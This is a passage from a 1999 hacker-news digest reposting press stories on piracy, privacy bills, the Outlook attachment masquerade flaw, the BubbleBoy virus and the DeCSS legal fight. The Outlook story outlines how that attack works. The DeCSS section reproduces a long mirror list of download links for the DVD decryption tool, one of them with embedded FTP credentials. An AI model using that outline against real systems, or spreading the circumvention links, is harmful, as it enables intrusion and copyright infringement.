directions in a different way than they did, said Mr. Darwish. But we
dont want to do anything that does not suit the ministry. However, the
decision does not affect a foreign phone over the Internet provider,
Net2-Phone Lebanon, which offers a similar service. Net2Phone is an agent
for US-based International Dealers for Telecommunication (IDT). It allows
customers to make telephone calls directly from their computers to regular
phone numbers all over the world for a fraction of the governments rates.
The service charges 15 cents a minute for a peak-time call to the U.S. and
10 cents at reduced rates, while the i-phone charged 65 cents. Making the
same call through the ministrys operator at the 100 number would cost up
to $1.40 a minute. But an expert in the information technology industry,
who refused to be named, predicted that the ministry would soon interfere
in the business of any company providing international calls via the
Internet. The ministry will always want to be the countrys only provider
of phone lines because it cannot do the same with data transfer, the
source said. Of Lebanons 10 current Internet service providers, only four
have access lines spread throughout the country. The service providers are
generating approximately $1m a month in revenues, thanks to growing
numbers of subscribers. According to ministry statistics, Lebanon has just
under half of the Arab worlds 85,000 Internet subscribers.
@HWA
30.0 Bond Fans Could Not Wait ?
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
The new James Bond movie "The World Is Not Enough" is
now available on the net, for free. UPI,the films legal
distributors, have launched an investigation to find out
how a film collectors' club got hold of the video-quality
copy and released on the Internet over a week before
its official release.
The Straits Times
http://straitstimes.asia1.com/cyb/cyb2_1108.html
NOV 8 1999
007 film hijacked
A copy of the latest Bond movie, The World Is Not
Enough, has been stolen before its official release
on Nov 18, and is available free over the Internet
LONDON -- The Internet bootleggers are more than a
match for James Bond.
A copy of one of the most widely trailed blockbusters of
the year -- the latest 007 movie, The World Is Not
Enough -- has been stolen before its official release and
is available free over the web, reported The Sunday
Times.
The paper said investigators believed it was the first time
a top movie had fallen victim to Internet thieves before
reaching the cinemas.
Experts suspect the Internet version might have been
copied from a trade tape sent across the Atlantic
between film executives.
For movie studios, it is a nightmare come true.
George Lucas, producer of the Star Wars films, said he
had believed the technology would not exist for several
years, but Star Wars: the Phantom Menace was being
downloaded on British computers within 24 hours of its
American premiere and sold on videotape at street
markets before it opened here.
At least Star Wars had a chance to make money before
the thieves got hold of it, The Times said. The 19th
Bond adventure is not due for release until Nov 18.
UPI, which paid millions to distribute it, launched an
investigation last week to find out how a secretive film
collectors' club got hold of the video-quality copy and
put it on the Internet.
The Times said the theft was not for profit: Hackers
prided themselves on distributing copies of movies,
computer games and software before their official
release.
Lavinia Carey, director-general of the British Video
Association, said bootlegging was a 2-billion
(S$5.5-billion) business.
In Malaysia, illicit copies outnumber originals by four to
one.
Most film companies believe distribution of movies over
the Internet is inevitable.
Microsoft is working on technology to allow films to be
sent live into ordinary computers.
One expert quoted by The Times warned: "Once that
technology is in place, it will be hijacked by the pirates.
They are in it for the technical challenge rather than the
money -- which is why not even James Bond can beat
them."
It'll take four days to download the movie
COPY of the latest James Bond movie -- The World Is
Not Enough -- was stolen by a secretive film collectors'
club.
The video-quality copy was then put on the club's
website on the Internet.
The Sunday Times of London said it took four days to
download the movie into an ordinary computer.
But it added that users with ISDN telephone lines can
make a copy overnight and then "burn" it onto a video
CD, which can then be watched on any home computer.
The website can be accessed only by people who are
given its seven-digit address as a reward for supplying
the club with early copies of films.
The site has been closed, but the film is still being
duplicated.
The Times did not give the address of the website.
Audiences in Singapore and Malaysia will be the first in
the world to see the movie, which will be released in the
two countries on Nov 18, one day before its American
release.
Mr Roger Pollock, managing director of United
International Pictures, the film's distributor in Singapore,
said last month:
"The reason Singapore and Malaysia are sharing the
same release date is to cut down on the potential threat
of video piracy."
HNN Update:
contributed by Alkivar
James Bond Still In The Can
Yesterday HNN posted a story originally from the London
Sunday Times claiming that the new James Bond Movie,
The World Is Not Enough has already made it onto the
internet a week before release. Today we have received
email claiming that this is not true. That the London
Sunday Times was inaccurate. That while pirated
Internet movie sites may have a directory for the James
Bond Movie there is in fact no movie in them. The Video
CD Release group iGN claims that this is all a hoax
perpetrated by them.
@HWA
31.0 Masquerade Attack Discovered for Outlook
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
By changing the three letter extension on an email
attachment it is easy to bypass MS Outlooks security
features. Email attachments with the extension to .gif
or .doc are ignored by Outlook and allowed to pass
through its filtering system.
C|net
http://news.cnet.com/news/0-1003-200-1432242.html?tag=st.ne.1002.bgif.1003-200-1432242
Outlook vulnerable to masquerade attack
By Stephen Shankland
Staff Writer, CNET News.com
November 8, 1999, 6:55 p.m. PT
A prominent computer "bug hunter" has found a vulnerability that allows a
malicious programmer to launch an email attack which bypasses some of the
precautions built into Microsoft's Outlook software.
The vulnerability smoothes the way for a new type of email-borne virus,
also called a Trojan horse, and other malicious software. Microsoft
Outlook is one of the most popular email programs in use.
Ordinarily, when a Microsoft Outlook user clicks on a file that has been
received as an "attachment," the program will ask whether the user wants
to open or save the attachment. Programs which exploit the vulnerability,
however, fool Outlook into executing the potentially harmful
software without asking permission.
Email containing a malicious payload is a popular new method of attacking
computers. For example, US West's internal network had to be shut down for
an evening about two weeks ago because of a self-generating attack.
The attack works by disguising the true identity of an email attachment so
that Outlook assumes the attached file is benign, said the discoverer,
Juan Carlos Garcia Cuartango, a Spanish researcher who has found
several other weaknesses in the past. The masquerade works because Outlook
doesn't examine files with common "extensions." An extension is a
three-letter filename suffix, such as "doc" or "gif."
"Outlook does not care about what the real attachment contains. It only
cares about the attached file suffix," Cuartango said in an email.
Microsoft was unable to comment on the vulnerability by press time.
The newly discovered problem affects Microsoft Outlook Express 4 and 5,
Outlook 98, and Outlook 2000, according to Elias Levy, chief technology
officer of Security Focus, a company that monitors computer security
problems. There aren't yet reports of active attacks using the
vulnerability, he said.
"I think it's very severe," Levy said. "It could be used to create
something just as bad or even worse than Melissa," he said, speaking of a
virus that swept the Internet in March.
Melissa was successful largely because it automatically sent copies of
itself to unsuspecting users via Microsoft Outlook email software.
Antivirus software initially failed to detect the virus, although Melissa
ultimately proved a bonanza for antivirus companies.
Since its emergence, several other variants have appeared on scene.
Cuartango said he notified Microsoft of the vulnerability on October 15.
The basic problem isn't being fixed by companies such as Microsoft and
Netscape, Levy believes.
"Cuartango and [fellow bug catcher Georgi] Guninski have shown we just
have this cycle. They find a bug, the vendor patches it, a week goes by,
and they find another one," Levy said. "We have to look beyond that at
what's fundamentally wrong here: We have programs such as Web
browsers and email clients that connect to an untrusted network from which
they receive data they do not trust."
Levy believes the solution is to adopt a method used by the military, in
which programs run in a safe zone within a computer--a cordoned-off area
where the programs have minimum privileges and can't do any damage. Sun
Microsystems has taken steps in this direction with its "sandbox" area,
Levy said, but there still is room for attacks that don't use Java and
companies have had some difficulties in making sure Java works like it's
supposed to.
The Unix operating system, which is supposed to restrict the actions of
computer tasks not run by the system administrator, is better than
Windows, Levy said. However, it's "definitely not the solution either."
The new vulnerability works through a series of disguises, Levy said.
First, the malicious program is converted into a Microsoft archive format
called a "cab" file. Then, the cab file is renamed with an extension of a
file type that Outlook isn't concerned with (such as "jpg," "mov,"
or "txt"), then emailed as an attachment.
When the victim clicks on the attachment, the cab file is decompressed and
its contents saved to a specific location. The last stage occurs when a
Javascript program in the email then can execute the potentially malicious
program that was contained in the cab file.
To protect against the problem, Security Focus recommends changing the
default location for temporary files from TEMP or TMP to some other,
unpredictable location. "You can also disable Javascript," the company
said.
@HWA
32.0 Feds May Create Database to Steal Privacy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
Today the US House of Representatives will debate the
creation a huge federal database to track and identify
Americans citizens who default on student loans or who
should not be receiving unemployment benefits. The
database would require the Department of Health and
Human Services to track the name, address, Social
Security Number and employment status of people who
are believed to be defrauding the government. It will
then force employers to verify an applicants status with
the database. (And you wonder why the government is
so against privacy laws? Because shit like this would be
illegal.)
Wired
http://www.wired.com/news/politics/0,1283,32435,00.html
The Fed's Deadbeat Database
by Declan McCullagh
4:00 p.m. 9.Nov.1999 PST A vast federal database will be used to identify
Americans who default on student loans or who should not be receiving
unemployment benefits, according to a bill scheduled for debate Wednesday
by the US House of Representatives.
The measure would require the Department of Health and Human Services to
use a national list of current public and private-sector employees to
track people suspected of cheating the government out of money.
The American Civil Liberties Union and some conservative groups are trying
to rally last-minute opposition to the measure, which proponents say would
reduce fraud by as much as US$800 million a year.
"This legislation would help turn employers' gates into government
checkpoints: Today the check is whether they owe child support. Tomorrow
the check is whether they can collect workman's comp. In the future the
check could be even more intrusive," says Greg Nojeim, ACLU
legislative counsel.
As part of a sweeping 1996 welfare reform law, Congress created the
"Deadbeat Dad" database to track fathers who did not pay child support.
Beginning in 1997, it required HHS to set up a computer system to record
names, Social Security numbers, birthdates, and employers.
Phyllis Schlafly's Eagle Forum says it hopes to defeat the "Fathers Count
Act", which is sponsored by Representative Nancy Johnson (R-Connecticut)
and expands the use of the database.
"We're opposed to expanding the use for any reason. When it was created we
were told it would only be used for the purpose of tracking deadbeat
dads," said the Eagle Forum's Lori Cole.
The bill is designed to thwart "borrowers of loans made under title IV of
the Higher Education Act of 1965 that are in default" or owe other grant
money. It says information will be turned over to the Department of
Education and Justice Department prosecutors.
State unemployment agencies may submit a name and SSN to check if that
person receiving benefits is employed or not.
Under existing law, the Social Security Administration verifies that correct
SSNs are listed in the database. The Treasury Department and the IRS also
have full access.
@HWA
33.0 CMU Invades Students Computers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Space Rogue
Carnegie Mellon University (CMU) disconnected the dorm
room access of 71 students after the systems where
scanned and found to have MP3 files on them. CMU
claims they where pressured into the scan by RIAA
(Recording Industry Association of America), who denies
the accusation. Details are sketchy as to how the
school actually performed the scan or if they illegally
broke into the systems to gather the information. No
warnings about the search was given to students which
may have violated the Digital Millennium Copyright Act
of 1998. It is unclear whether the school verified the
legal status of each MP3 file. Some students had posted
their own music and not pirated materials. (If this was
done by a simple web crawler a robot.txt file should
take care of it.)
MP3.com
http://www.mp3.com
@HWA
34.0 New Privacy Alerting Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
"Enonymous Advisor" is a free internet utility that kicks
in when a one opens a web page that requests personal
information. It shows the web site's rating, which is
based on Enonymous' evaluation of the site's privacy
policies, with regards to consumer privacy. (Big whoop.
The problem is that there are no laws. Companies are
free to write one thing in the policy and then do
another, or change the policy at anytime without
notifying users.)
Star Tribune
http://www.startribune.com/stOnLine/cgi-bin/article?thisSlug=TECR10&date=10-Nov-1999
FYI: New firm offers privacy alerts
Enonymous.com wants to give Web surfers a more complete picture of exactly
how sites that collect data from users plan to use their names, e-mail
addresses and any other data they collect.
The company is distributing a free Internet utility called Enonymous
Advisor. A computer equipped with the Advisor, which can be downloaded
from http://www.enonymous.com , detects sites that request personal
information. When a fill-in-the-blank form is opened on a user's Web
browser, a window pops up with information about how the site rates on
consumer privacy. The ratings are based on Enonymous' evaluation of the
site's privacy policies.
Amazon.com, Yahoo.com and Expedia.com are among about two dozen sites
receiving one star each -- the lowest rank, which means that the site may
share personal data without permission. The maximum rating is four stars.
For example, Amazon.com's privacy policy states that it "does not sell,
trade, or rent your personal information to others," but adds, "We may
choose to do so in the future with trustworthy third parties, but you can
tell us not to by sending a blank e-mail message to never@amazon.com.'';
Amazon spokesman Paul Capelli said, "I think our policy is clearly
defined, and that our customers are comfortable with it."
Enonymous.com awarded four stars to sites such as eBay.com, AOL.com and
Hotmail.com, which share users' information only with their permission and
will contact them, via e-mail or otherwise, only with their permission.
In the next year Enonymous plans to create the online equivalent of
anonymous post-office boxes for people who want to receive ads without
giving out their e-mail addresses.
-- New York Times
The Net
Web hits
http://www.daytradingfirms.com
Still in its infancy, day trading can be a lucrative -- and volatile --
way to exploit the stock market. This site links to several firms that
provide training and help execute day trades.
-- Tribune Media Services
@HWA
35.0 CypherPunks to Host Echelon Discussion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Brian Oblivion
The next physical meeting of the San Francisco Bay
Area Cypherpunks will feature Echelon, the almost
mythical global eavesdropping network. The meeting will
feature a presentation by Duncan Campbell,who is
considered by many to be the civilian expert on this
topic. The meeting will be held on November 13, 1999.
It is free and is open to the public
CypherPunks Meeting
http://www.freedomfighter.net/cypherpunks/991113.html
@HWA
36.0 Cable And Wireless Optus Drops Legal Action Against Surfers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by marena
Australia's largest ISP, Cable and Wireless Optus,
suffered what they called "an unauthorized intrusion"
and proceeded to file charges against seven people who
had viewed user names and passwords on their site.
The Web surfers claimed that there was no intrusion
and that they had accidentally stumbled across an
insecure web page. A page that had been left available
to the public since last February.
Australian Broadcasting Company
http://www.abc.net.au/news/science/internet/1999/11/item19991110200840_1.htm
Optus drops legal action against hackers
One of Australia's largest Internet Service Providers
has dropped legal action against a small group of its
users who stumbled onto a site that detailed all the
passwords of the company's clients.
Cable and Wireless Optus launched the legal action
against seven people, including an international-level
tennis umpire and students studying for their HSC.
The company described the discovery last week as "an
unauthorised intrusion", but the defendants say they
were just web surfers who stumbled across an
unsecured web page.
They say the file listing the password in plain text had
been available to anyone with a web browser since
February, and the discovery was not part of a "hack" of
the Optus system.
The company, which operates the Optusnet, Microplex
and DingoBlue services, today dropped legal action
against two of the defendants, and says it will be
seeking agreement with the other five to do the same.
The terms of the settlement remain confidential, but
they do not include compensation to the defendants
who had their Internet accounts blocked and, in some
cases, their computers siezed.
The company concedes that the legal action, and the
lack of security on the password site, were not good
publicity, but says other customers would feel grateful
for the company's actions.
A spokeswoman says customers' piece of mind is the
major concern with any form of intrusion, and she is
confident the company had done the 'right thing', even
though some observers see the actions as
heavy-handed.
@HWA
37.0 BubbleBoy Virus Uses HTML
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by scores
By viewing this new virus, named Bubbleboy, on the
inbox screen of Microsoft's Outlook Express or other web
based email clients a user will become infected. It is no
longer necessary to open an attachment. Network
Associates has posted a new virus definition that stops
the virus. (This virus has not yet been reported as
infecting anyone, is not destructive, has a patch
available and it has been given a low threat rating. But
one new feature and it makes all the news sites.
Hmmmm, sensational?)
C|Net
http://news.cnet.com/news/0-1006-200-1433792.html?tag=st.ne.1002.tgif?st.ne.fd.gif.f
MSNBC
http://www.msnbc.com/news/333265.asp
Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500055552-500091363-500335153-0,00.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,1018067,00.html?chkpt=zdnntop
C|Net;
New, fast-spreading email virus found By John Borland Staff Writer, CNET
News.com November 9, 1999, 3:15 p.m. PT
update A virulent new kind of computer virus triggered simply by opening
an infected email message has been identified, antivirus researchers said
today.
The virus, dubbed "Bubbleboy," apparently hasn't yet made it onto the open
Internet, which means researchers haven't heard of any computers being
infected. But a version of the program was mailed anonymously to
researchers last night, indicating a high potential for future
infections.
The virus strikes a Seinfeld theme, changing the victim's computer's
registered owner to "Bubbleboy," a reference to an episode of the former
popular TV show. There are other references to the show in the
program: Users' company information is changed to "Vandelay Industries,"
and "Soup Nazi" also appears in the source code.
It appears in mailboxes with a subject line "Bubbleboy is back,"
researchers said. The virus marks a dangerous step forward in the
trend of using email to attack remote computers, researchers say. As with
several earlier similar fast-spreading viruses, it takes advantage of
security holes in Microsoft Outlook email software to run an unauthorized
program on victims' computers, changing information and emailing itself to
new targets.
Those viruses need a user to click on an email "attachment" in order to be
triggered, however. By contrast, Bubbleboy runs as soon as an Outlook user
opens an infected email, or even when an Outlook Express user
previews a message.
"If this got into the wild, it would spread incredibly quickly," said Dan
Schrader, an antivirus researcher with Trend Micro. "This would make
Melissa look slow."
Melissa was successful largely because it automatically sent copies of
itself to unsuspecting users via Outlook. Antivirus software initially
failed to detect the virus, although Melissa ultimately proved a
financial bonanza for antivirus companies. Fears of an even more quickly
spreading threat could prompt another surge in antivirus software sales.
The new virus requires a user to be running Microsoft's Outlook email
program, Windows 95, 98, or 2000, and Internet Explorer 5.0 or higher. It
targets a security hole for which Microsoft has already created a
fix, but which many users still have yet to use, researchers say.
Microsoft did not have a comment on the virus by press time.
The development marks a dangerous--if widely predicted--step in virus
technology, researchers say. Nevertheless, Bubbleboy itself is relatively
benign, aside from its mass email effects.
But more malicious programs, carrying effects such as deleting files or
programs from a victim's computer, could also theoretically be included in
this kind of virus.
This style of virus could also be used for more targeted attacks,
researchers said. This could include sending programs designed to do
specific tasks--such as emailing the contents of an inbox to a third
party--to a specific individual.
"We used to say that as long as you didn't open an email attachment from
someone you don't know, you were fine," said Sal Viveros, group marketing
manager for the antivirus division of Network Associates. "Now we've
come to the point where you must use antivirus protection if you're going
to use email."
The patch provided by Microsoft will protect users from this version of
Bubbleboy. Antivirus software that scans emails as they come through an
ISP or corporate network will also stop the program, as soon as the
antivirus companies finish their analysis and update their programs with a
filter.
Researchers at Network Associates say they suspect the same author who
created the recent VBS.Freelink attack. Viveros said his company notified
Microsoft and the Federal Bureau of Investigation last night.
The companies stress that it is still a potential, rather than an
imminent, threat.
"We have not seen any instances of infection at all," Trend Micro's
Schrader said. "This is not something that people should be panicking
over. But it is kind of scary."
@HWA
38.0 DVD Decrypters Sued - DeCSS Labeled A 'Good Thing'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench and jmaier
At least two programmers involved in creating the
DeCSS DVD decryption utility have been contacted by
motion picture industry lawyers and have been asked to
remove the information regarding the utility DeCSS their
Web sites. Members of the Norwegian group "Masters of
Reverse Engineering" who came up with the crack have
complied with the lawyers request since they can not
afford the legal battle. At last count there where over
41 different mirrors in 8 different countries. It is unlikely
that the lawyers will be able to shut them all down.
Wired
http://www.wired.com/news/politics/0,1283,32449,00.html
List of Mirror Sites
http://www.rhythm.cx/dvd/
Noted Cryptographer Bruce Schneier has called the
recent breaking of the DVD encryption a 'good thing'. He
goes on to talk about how the DVD encryption scheme
was flawed from the start and that it was only a matter
of time before someone figured out how to decrypt it.
ZD Net
http://www.zdnet.com/zdnn/stories/comment/0,5859,2391975,00.html
Late Update 162515NOV99EST
The lawyers are doing what they can. The above list of
mirrors has been taken down, however replacements
have sprouted up.
Mirrored List of Mirrors #1
http://www.lemuria.org/DeCSS/
Mirrored List of Mirrors #2
http://www.humpin.org/decss/
Mirrored List of Mirrors #3
http://www.2600.com/news/1999/1112-files/www.rhythm.cx/
Wired;
DVD Hackers Headed to Court?
by Declan McCullagh
3:00 a.m. 10.Nov.1999 PST
If there's one thing entertainment industry lawyers don't like, it's someone
copying CDs or DVDs.
But what they really, truly detest are the upstart hackers who discovered
how to copy DVD films -- and had the temerity to distribute a program that
does just that.
Motion picture industry lawyers have reportedly contacted at least two
programmers involved in developing the DeCSS utility and asked them to
delete information from their Web sites.
One of the members of the Norwegian group "Masters of Reverse Engineering"
said an Oslo attorney from Simonsen and Musæus, representing the movie
industry, has demanded that he remove a link to DeCSS from his Web site.
"I know very well that they would not win in court, but they could make a
big mess out of it. I simply do not have the time, nor money, to go up
against these people," Jon Johansen announced in a letter he posted online
Tuesday. He said he decided to yank the link.
DVD's security system was intended to be hacker-proof, but MoRE recently
figured out how to circumvent it -- a move that could open up illicit
trading of digital movies and could cost the entertainment industry
millions of dollars.
The program, a tiny utility called DeCSS, allows knowledgable users to
copy any DVD movie to a .VOB file that ranges between 4.7 and 9.4 GB.
Just in case the lawyers get even nastier, the Linux community has a
not-so-secret weapon: Mirror sites. By late Tuesday, over a dozen
activists had placed copies of DeCSS online, and an index site includes
links to all of them.
In a post to a Linux-DVD mailing list Tuesday, Derek Fawcus disclaimed all
responsibility for the project.
"I will have nothing to do with work on DeCSS. If there is any work that I
may be considered to have ownership of, I give up all rights to that
work," he wrote.
Fawcus told Wired News last week that he had rewritten some of the DVD
decoder assembler code in the C programming language, and that code was
later used in DeCSS.
Fawcus wrote in a message last Friday that "the legal side has started"
and said that he had been accused of violating a 1998 UK copyright act.
That law restricts anyone who "publishes information intended to enable or
assist persons to circumvent that form of copy protection."
While the US Constitution's First Amendment would probably make such a law
in America unenforceable, Congress is debating a controversial
anti-circumvention law that would prevent people from decoding or removing
security from files and bypassing the rights of copyright owners.
Industry groups could not be reached Tuesday for comment. But the Japan-based
DVD Forum recently issued a statement condemning the Linux hackers' exploits
as "illegal and inappropriate."
-=- Mirror list -=-
Here is the most recent version of the css-auth CVS code as well as DeCSS.
Please mirror & redistribute. This site has limited bandwidth, try to use a
mirror first. Please mail additional mirrors and broken links to altair@rhythm.cx.
NOTE (Thu, Nov 11, 12:17pm EST): I've recently been informed that a law firm
which is likely to be one that would try get these mirrors taken down has been
visiting this mirror site as well as others. With that said, there is a possibility
that I may have to remove this site in the near future because like everyone else,
I can't afford to go to court to fight it. Luckly, it seems fairly unlikely that
any law firm will ever be able to get rid of all these mirrors at this point (there
are currently 41 in 8 different countries and this list is growing every day). However,
I have only seen very few mirror _lists_ like this one anyplace. If anyone has the
resources, it might be wise to mirror this list of mirrors as well so that the right
people will still know that these mirrors exist.
css-auth.tar.gz - The code form an open source DVD project.
DeCSS.zip - A Win32 binary for decrypting DVD data streams.
MD5 Sums:
5b8347b8b857f8470b8dbd9a905fc194 css-auth.tar.gz
d0aff684327a5c7bf110951e42ec3cae DeCSS.zip
The Md5 sum shown here for css-auth.tar.gz may be different from some other people's as
I rebuilt this archive myself. It was originally downloaded from the main site as a zip file.
Page last updated: Fri, Nov 12, 2:55pm EST
Current Mirrors (49 so far):
http://www.rhythm.cx/dvd/css-auth.tar.gz and http://www.rhythm.cx/dvd/DeCSS.zip
http://home.worldonline.dk/~andersa/download/DeCSS.zip
http://douglas.min.net/~drw/css-auth/
http://www.devzero.org/freecss.html
http://home.t-online.de/home/skinner01/decss.zip
http://www.chello.nl/~f.vanwaveren/css-auth/css-auth.tar.gz
http://www.geocities.com/ResearchTriangle/Campus/8877/index.html
http://www.angelfire.com/mt/popefelix/
http://www.vexed.net/CSS
http://members.brabant.chello.nl/~j.vreeken/
http://gullii.stu.rpi.edu/dvd/files/DeCSS.zip
and http://gullii.stu.rpi.edu/dvd/files/css-auth.tar.gz
http://www.dvd.eavy.de/css-auth.tar.gz
http://www.eavy.net/stuff/dvd/css-auth.tar.gz
and http://www.eavy.net/stuff/dvd/DeCSS.zip
http://www.dynamsol.com/satanix/DeCSS.zip
http://www.dvd.eavy.de/DeCSS.zip
http://frozenlinux.com/civ/decss/
http://www.humpin.org/decss/
http://www.unitycode.org/
http://dirtass.beyatch.net/decss.zip
http://sharedlib.org/decss.zip
http://decss.tripod.com/index.html
http://www.free-dvd.org.lu/
ftp://134.173.94.44/
http://www.angelfire.com/in2/mirror/
http://mclaughlin.orange.ca.us/~andrew/
http://www.dynamsol.com/satanix/css-auth.tar.gz
http://batman.jytol.fi/~vuori/dvd/
http://www.zpok.demon.co.uk/deCSS/CSS.html
http://plato.nebulanet.net:88/css/
ftp://alma.dhs.org/pub/DVD/
http://www.d.umn.edu/~dchan/css/
http://www.logorrhea.com/main.html
http://people.delphi.com/salfter/LiVid.tar.gz
http://www.theresistance.net/files.html
ftp://193.219.56.32/pub/dvd/LiVid.CVS-11.06.tar.gz
and ftp://193.219.56.32/pub/dvd/LiVid.CVS-11.06.css-stuff-only.tar.gz
http://merlin.keble.ox.ac.uk/~adrian/css/index.html
http://www.dvd-copy.com/
http://www.zip.com.au/~cs/dvd/css/css-auth.tar.gz
and http://www.zip.com.au/~cs/dvd/css/DeCSS.zip
http://www.sent.freeserve.co.uk/css-auth.tar.gz
and http://www.sent.freeserve.co.uk/DeCSS.zip
http://members.tripod.lycos.nl/jvz/
http://joe.to/storage/files/decss.zip
ftp://ftp.firehead.org/pub/
http://www.lemuria.org/DeCSS/
http://members.theglobe.com/avoiderman/dvd.htm
http://remco.xgov.net/dvd/
http://www.able-towers.com/~flow/
ftp://dvd:dvd@206.98.63.136
http://www.twistedlogic.com/html/tl_archive_map.htm
http://dvdcracked.tvheaven.com/index.html
This site contains some good technical documentation as well as more source
code that the DVD consorium's layers would rather you not see:
http://crypto.gq.nu/ Local Mirror: http://www.rhythm.cx/dvd/crypto.gq.nu
Broken Mirrors
(These are listed here for the notification of the people who run them.
I don't know who runs which mirrors; I delete their email once I've added
their site in order to ensure their annonymity in the event that the DVD
consortium's layers start gnawing at my ankles as well.)
ftp://mikpos.dyndns.org/pub/cssdvd.zip
ZDnet;
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
DVD encryption break is a good thing
By Bruce Schneier, ZDNN
November 11, 1999 9:23 AM PT
URL: http://www.zdnet.com/zdnn/stories/comment/0,5859,2391975,00.html
The scheme to protect DVDs has been broken. There are now freeware programs on the Internet
that remove the copy protection on DVDs, allowing them to be played, edited, and copied
without restriction.
This should be no surprise to anyone, least of all to the entertainment industry.
The protection scheme is obviously flawed in several ways. Each DVD is encrypted with
something called Content Scrambling System (CCS). It has a 40-bit key. (I have no idea why.
The NSA and the FBI don't care about DVD encryption. There aren't any terrorist movies they
need to be able to watch.) It's not even a very good algorithm. But even if the encryption were
triple-DES, ths scheme would be flawed.
Every DVD player, including hardware consoles that plug into your television and software players
that you can download to your computer, has its own unique unlock key. This key is used to
unlock the encryption key on the DVD. Every DVD has 400 copies of the same decryption key,
each encrypted with every unlock code. Note the global secret: if you manage to get one unlock
key, you can decrypt every DVD.
But even if this were all perfect, the scheme could never work. The software player eventually gets
the decryption key, decrypts the DVD, and displays it on the screen. That decrypted DVD data is
on the computer. It has to be; there's no other way to display it on the screen. No matter how
good the encryption scheme is, the DVD data is available in plaintext to anyone who can write a
computer program to take it.
And so is the decryption key. The computer has to decrypt the DVD. The decryption key has to
be in the computer. So the decryption key is available, in the clear, to anyone who knows where
to look.
The DVD software manufacturers were supposed to disguise the decryption program, and the
playing program, using some sort of software obfuscation techniques. These techniques have never
worked for very long; they only seem to force hackers to spend a couple of extra weeks figuring
out how the software works. I've written about this previously in relation to software copy
protection; you can't obfuscate software.
It might be a bitter pill for the entertainment industry to swallow, but software content protection
does not work. It cannot work. You can distribute encrypted content, but in order for it to be
read, viewed, or listened to, it must be turned into plaintext. If it must be turned into plaintext, the
computer must have a copy of the key and the algorithm to turn it into plaintext. A clever enough
hacker with good enough debugging tools will always be able to reverse-engineer the algorithm,
get the key, or just capture the plaintext after decryption. And he can write a software program
that allows others to do it automatically. This cannot be stopped.
If you have secure hardware, you can prevent it. The attack works because the hacker can run a
debugger and other programming tools. If the decryption device and the viewing device (it must be
both) is inside a tamperproof piece of hardware, the hacker is stuck. He can't reverse-engineer
anything. But tamperproof hardware is largely a myth, so in reality this would just be another
barrier that someone will eventually overcome.
One more lesson, and an observation.
The lesson: This is yet another example of an industry meeting in secret and designing a proprietary
encryption algorithm that ends up being embarrassingly weak. I never understand why people
don't use free, public, encryption algorithms. They're almost always better.
The observation: One solution that the entertainment industry has been pushing for is to make
reverse-engineering illegal. They managed in the United States: the Digital Millennium Copyright
Act includes provisions to this effect, despite the protests of the scientific and civil rights
communities. (Yes, you can go to jail for possessing a debugger.) This "solution" does not work
and makes no sense.
First, unless reverse-engineering is illegal everywhere on the planet, someone will be able to do it
somewhere. And one person is all you need; he can write software that everyone else uses.
Second, the reverse-engineer can--like in this case--work anonymously. Laws wouldn't have
helped in this case. And third, laws can't put the cat back into the bag. Even if you could catch and
prosecute the hackers who did this, it wouldn't affect the hacker tools that have already, and
continue to be, written.
The fatal flaw is that the entertainment industry is lazy, and are attempting to find a technological
solution to what is a legal problem. It is illegal to steal copyrights and trademarks, whether it is a
DVD movie, a magazine image, a Ralph Lauren shirt, or a Louis Vitton handbag. This legal
protection still exists, and is still strong. For some reason the entertainment industry has decided
that it has a legal right to the protection of its technology, and that makes no sense.
This DVD break is a good thing. It serves no one's interests for the entertainment industry to put
their faith in a bad security system. It is good research, illustrating how bad the encryption
algorithm is and how poorly thought out the security model is. What is learned here can be applied
to making future systems stronger.
Bruce Schneier is CTO of Counterpane Internet Security, Inc., based in San Jose, Calif
@HWA
39.0 Class Action Suits Brought Against RealNetworks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond And Lamer
Two class action law suits, one in Pennsylvania and
another in California, have been filed against
RealNetworks. The suits allege that RealNetworks
invaded users privacy by collecting information about
them without their knowledge when they used
RealJukebox. Such collection of data allegedly violates
the federal Computer Fraud and Abuse Act as well as
California business statutes. The California lawsuit
reportedly seeks compensatory and punitive damages of
$500 per user.
Wired
http://www.wired.com/news/politics/0,1283,32459,00.html
South China Morning Post
http://www.technologypost.com/business/DAILY/19991110105842581.asp?Section=Main
Wired;
RealNetworks in Real Trouble
Wired News Report
9:15 a.m. 10.Nov.1999 PST Internet music consumers took RealNetworks to
court Wednesday over recently discovered user-tracking behavior in the
company's Internet music software.
In a class-action suit filed in the Federal District Court for the Eastern
District of Pennsylvania, the plaintiffs charged that RealNetworks
violated federal and state law by misrepresenting the use and collection
of personal data by users of the RealJukebox software.
"This action is being filed on behalf of the millions of users of the
RealJukebox software to obtain compensation and other relief for the
violations of federal and state law alleged in the complaint," said
Jonathan Shub, a member of law Pennsylvania law firm Sheller, Ludwig &
Badey, in a statement. "RealNetworks must be held accountable for its
conduct."
The suit accuses RealNetworks of assigning a GUID (global unique
identifier) to each RealJukebox user without the user's knowledge, then
compiling information about people's music-listening habits.
RealNetworks violated the federal Computer Fraud and Abuse Act as well as
state privacy laws and consumer protection statutes, according to the
complaint.
The action is similar to a suit filed last week in California against
